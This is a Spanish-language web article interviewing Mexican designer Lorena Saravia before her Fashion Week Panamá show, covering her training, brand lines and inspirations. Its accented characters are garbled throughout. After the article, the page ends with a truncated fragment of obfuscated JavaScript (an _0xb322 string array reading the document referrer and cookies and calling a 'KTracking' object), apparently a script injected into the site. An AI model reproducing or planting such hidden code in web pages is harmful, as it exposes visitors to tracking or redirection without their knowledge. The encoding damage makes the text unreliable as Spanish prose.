Lorena Saravia es una de las diseAi??adoras mA?s reconocidas de MAi??xico en la actualidad, y esta noche presentarA? sus creaciones en el Fashion Week PanamA?.

Obtuvo su tAi??tulo en la Universidad de DiseAi??o y Moda Felicidad Duce, en Barcelona, yAi?? antes de crear su propia marca, trabajA? con Bread and Butter Barcelona, Gstar ai??i?? Raw y con el renombrado diseAi??ador Macario JimAi??nez.

AdemA?s, la joven talento se convirtiA? en la ganadora del primer concurso Whoai??i??s On Next de Vogue MAi??xico, luego de lo cual decidiA? abrir su primera boutique en la avenida Presidente Ma- saryk en la colonia Polanco, la calle donde se encuentran las boutiques mA?s prestigiosas en Ciudad de MAi??xico.

Saravia, quien lleva siete de sus 33 aAi??os en el mundo de las costuras, define su marca como ai???clA?sica, contemporA?nea y mAi??nima. Pensada para una mujer 360, que es empresaria, mamA?, amiga y mujerai???. Sus prendas se caracterizan por una estAi??tica sobria, sofisticada y funcional.

La marca cuenta con tres lAi??neas: LS Basics, Ready to Wear y Runway, que van de lo casual a lo elegante, y que se pueden combinar fA?cilmente entre ellas, creando la flexibilidad de la mujer multifacAi??tica.

El show deAi??Lorena SaraviaAi??serA? presentado por prestigiosas , el 12 de octubre, en el showcaseAi??de las 7:30 p.m. Hablamos en exclusiva con ella, y aunque prefieriA? no develar los detalles de su pasarela, sAi?? mencionA? que su colecciA?n tendrA? piezas ai???que identifiquen a la marcaai???.

El show de Lorena Saravia serA? presentado por La Estrella de PanamA?, el 12 de octubre, a las 7:30 p.m. CortesAi??a

A?CA?mo descubriste tu gusto por la moda y cA?mo te has formado en esta industria?
Toda la vida he admirado el tema del diseAi??o. La costura siempre ha estado en mi familia, pero nadie lo habAi??a convertido en un negocio hasta que se me ocurriA? en Barcelona. De ahAi?? en adelante he tenido que combinar ser diseAi??adora y empresaria a la vez.

A?CA?mo defines tu marca?
ClA?sica, contemporA?nea, mAi??nima. Esta pensada para una mujer 360, una mujer que es empresaria, es mamA?, es amiga, y es mujer.

A?QuAi?? elementos estA?n presentes en tu estilo?
Cortes estructurales con detalles afinados, jugando siempre con diferentes elementos.

A?Para quAi?? tipo de mujer son tus diseAi??os?
Para una mujer fuerte, contemporA?nea, actual, vocera dentro de su medio, lAi??der en su campo de trabajo, que trabaja y es mamA?, que le gusta salir a cenar y despertarse temprano para hacer ejercicio. Una mujer actual.

A?De dA?nde nace tu inspiraciA?n para cada creaciA?n?
De constituir un ADN claro para la marca. La mA?sica es algo que me ha caracterizado mucho, asAi?? como las personas que me rodean.

A?AlgA?n diseAi??ador ha marcado tu estilo?
Alber Elbaz

A?QuAi?? expectativas tienes con tu pasarela en FWP 2017?
Que mA?s gente conozca la marca y se enamore de ella en AmAi??rica Latina. Estoy muy emocionada por ver cA?mo lo va a recibir en esta ocasiA?n PanamA?.

A?QuAi?? tipo de piezas presentarA?s en FWP?
No te puedo adelantar. Pero serA? algo que identifique a la marca.

TambiAi??n realizarA?s la conferencia InnovaciA?n en el lanzamiento de colecciones.
Se trata de cA?mo impulsar y entender la industria de la moda en un paAi??s donde no hace una diferencia en la economAi??a.

A?QuAi?? detalles y elementos se deben considerar para innovar al lanzar una colecciA?n?
Respetar tu ADN y conservar tu mismo estilo. Por lo general, intento plasmar las nuevas ideas o inquietudes que me surgen, temporada tras temporada.

A?CA?mo hacer para que una colecciA?n preserve el estilo del diseAi??ador, tenga identidad, pero que no se sienta que es lo mismo?
A?Esa justo es la chamba de un diseAi??ador!

A?QuAi?? viene despuAi??s del FWP para ti?
Las ventasai??i?? Parte clave en el proceso.

 

 

lse {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}